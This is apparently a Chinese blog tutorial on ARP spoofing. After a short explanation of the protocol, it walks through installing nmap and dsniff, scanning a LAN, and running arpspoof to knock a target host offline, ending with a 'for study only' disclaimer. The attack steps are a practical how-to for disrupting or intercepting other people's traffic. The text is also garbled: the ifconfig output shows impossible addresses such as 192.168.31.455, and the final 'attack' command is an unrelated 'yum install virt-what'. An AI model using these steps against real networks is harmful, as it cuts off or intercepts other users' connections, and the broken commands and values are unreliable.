前言
ARP:地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。地址解析协议是建立在网络中各个主机互相信任的基础上的,网络上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存;由此攻击者就可以向某一主机发送伪ARP应答报文,使其发送的信息无法到达预期的主机或到达错误的主机,这就构成了一个ARP欺骗。ARP命令可用于查询本机ARP缓存中IP地址和MAC地址的对应关系、添加或删除静态对应关系等。相关协议有RARP、代理ARP。NDP用于在IPv6中代替地址解析协议。
ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。
注意
ARP攻击的局限性:ARP攻击仅能在以太网(局域网如:机房、内网、公司网络等)进行,无法对外网(互联网、非本区域内的局域网)进行攻击。
需要的软件
1.nmap
2.dsniff(arpspoof)
3.net-tools(ifconfig)
软件获取指令:
安装dsniff(ARP嗅探工具)命令
sudo apt install dsniff
安装net-tools(网络工具)命令
sudo apt install net-tools
安装nmap(网络嗅探工具)命令
sudo apt install nmap
注意:如果提示没有该软件包,请尝试apt update和apt upgrade,如果还是没用请搜索安装该工具的教程!
小插曲:上文提到的apt为系统的软件包管理器,下面我给列出
apt : Debian Ubuntu Mint Deepin
yum : Fedora RedHat
zypper : openSUSE SUSE
yaourt : Arch
pkg : BSD
brew : macOS
正式教程
假设目标主机IP地址为:192.168.31.30
本机IP为:192.168.31.20
先获取root权限:
sudo su
1.为了还原情景,先用nmap扫描当前局域网下的主机
命令:
nmap -sP 192.168.31.*
屏幕显示:
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-20 12:06 CST
Nmap scan report for 192.168.31.10
Host is up (0.0056s latency).
Nmap scan report for 192.168.31.20
Host is up (0.0029s latency).
Nmap scan report for 192.168.31.30
Host is up (0.010s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.63 seconds
●由此可以查看当前局域网下有192.168.31.10 192.168.31.20 192.168.31.30三台主机(IP)
2.使用ifconfig扫描当前网卡:
命令:
ifconfig
屏幕显示:
Link encap:Local Loopback
inet addr:127.0.0.1 Mask:455.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:1390 errors:0 dropped:0 overruns:0 frame:0
TX packets:1390 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:123884 (120.9 KiB) TX bytes:123884 (120.9 KiB)
wlp1s0 Link encap:Ethernet HWaddr 64:CC:2E:AD:C1:D4
inet addr:192.168.31.20 Bcast:192.168.31.455 Mask:455.455.455.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:19339 errors:0 dropped:2251 overruns:0 frame:0
TX packets:12504 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:21855109 (20.8 MiB) TX bytes:1546146 (1.4 MiB)
●由此可以查看本机网卡型号是wlp1s0(无线网卡),IP地址(inet addr):192.168.31.20等信息
3.现在就可以使用arpspoof命令对目标主机进行断网攻击了
命令语法:
arpspoof -i [网卡] -t [目标IP] -r [网关]
所以我们应该执行的命令是:
yum install virt-what
屏幕这是会出现一堆“代码”,然后我们再用192.168.31.30这台主机打开网页,会发现无法打开。因此成功实现了ARP断网攻击。
注意!注意!注意!此内容仅供学习研究,禁止非法使用,违者后果自负!
版权声明:未标注转载均为本站原创,转载时请以链接形式注明文章出处。如有侵权、不妥之处,请联系站长删除。敬请谅解!
说道: